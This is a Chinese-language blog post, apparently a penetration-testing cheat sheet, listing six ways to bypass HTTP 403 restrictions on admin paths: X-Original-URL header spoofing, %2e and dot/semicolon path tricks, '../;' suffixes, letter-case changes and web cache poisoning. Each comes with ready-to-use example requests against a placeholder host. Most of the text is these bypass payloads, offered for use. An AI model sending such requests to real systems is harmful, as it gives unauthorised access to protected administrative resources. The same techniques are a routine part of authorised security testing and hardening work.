🚀 403 页面绕过技巧

  1. 🌐 使用 "X-Original-URL" 头:

    • 原理 :某些服务器在处理请求时,会检查 X-Original-URL 头部来确定请求的原始 URL。这种方法利用了服务器对 X-Original-URL 头部的信任,将其值设置为受限制的路径,从而绕过访问控制。

    • 原始请求:

      http 复制代码
      GET /admin HTTP/1.1
      Host: target.com
    • 绕过请求:

      http 复制代码
      GET /anything HTTP/1.1
      Host: target.com
      X-Original-URL: /admin
  2. ✨ 在第一个斜杠后添加 %2e

    • 原理%2e 是 URL 编码表示的点 (.),某些服务器可能会错误地解析它,导致忽略路径的一部分,从而访问受限制的资源。

    • 原始请求:

      http 复制代码
      http://target.com/admin => 403
    • 绕过请求:

      http 复制代码
      http://target.com/%2e/admin => 200
  3. 🛠 尝试在 URL 中添加点 (.) 斜杠 (/) 和分号 (;):

    • 原理:一些服务器在处理路径时,可能会忽略或错误处理特殊字符,如点 (.)、斜杠 (/) 和分号 (;),从而允许访问受限制的资源。

    • 原始请求:

      http 复制代码
      http://target.com/admin => 403
    • 绕过请求:

      http 复制代码
      http://target.com/secret/. => 200
      http://target.com/secret//. => 200
      http://target.com/./secret/.. => 200
      http://target.com/;/secret => 200
      http://target.com/;//secret => 200
  4. 🗂 在目录名称后添加 ../;

    • 原理 :目录遍历攻击的一种变体,通过在路径中添加 ../;,可能会绕过服务器的访问控制检查,直接访问受限制的资源。

    • 原始请求:

      http 复制代码
      http://target.com/admin
    • 绕过请求:

      http 复制代码
      http://target.com/admin../;
  5. 🔠 尝试将 URL 中的字母大写:

    • 原理:某些服务器对路径区分大小写,通过更改路径中某些字母的大小写,可能会绕过访问控制检查。

    • 原始请求:

      http 复制代码
      http://target.com/admin
    • 绕过请求:

      http 复制代码
      http://target.com/aDmIN
  6. 📦 通过 Web 缓存中毒:

    • 原理:利用 Web 缓存服务器对请求头的信任,将受限制路径的值存入缓存中,从而在后续请求中绕过访问控制。

    • 绕过请求:

      http 复制代码
      GET /anything HTTP/1.1
      Host: victim.com
      X-Original-URL: /admin
相关推荐
wbcq_cqg34 分钟前
万伯1500方双膜气柜沼气项目案例
经验分享·安全
码视野36 分钟前
基于 Spring Boot + Vue3 的【高校化学实验室安全准入考试与危化品配伍排查系统】设计与实现(含PRD/三端高保真源码/大屏)
前端·人工智能·spring boot·后端·安全·vue3
头茬韭菜1 小时前
功能点 11-12:客户端、RPC 通信、监控与安全
网络协议·安全·rpc·fluss
数据知道1 小时前
Java 安全审计实战:SSRF、反序列化、SpEL 注入
java·开发语言·安全·网络安全
_codeOH2 小时前
LLM 应用安全实战:从 Prompt 注入到数据泄露的防护体系
安全·ai编程
shiyi.十一3 小时前
第8章:计算机网络中的安全 — 知识要点与架构
计算机网络·安全·架构
国科安芯4 小时前
小卫星综合电子系统中RISC-V抗辐射MCU的功能安全与多接口集成架构分析
单片机·嵌入式硬件·安全·fpga开发·架构·risc-v
OpenCloudOS4 小时前
高危|Linux 内核 XFS reflink 本地提权漏洞修复指南
linux·网络·安全
黎阳之光5 小时前
软硬协同国产化 | 黎阳之光矩阵式视频融合管理系统完成摩尔线程国产GPU兼容适配
大数据·人工智能·物联网·安全·数字孪生
Amir_zy5 小时前
AI 测试实战:从功能到安全,三层质量验证体系详解
人工智能·安全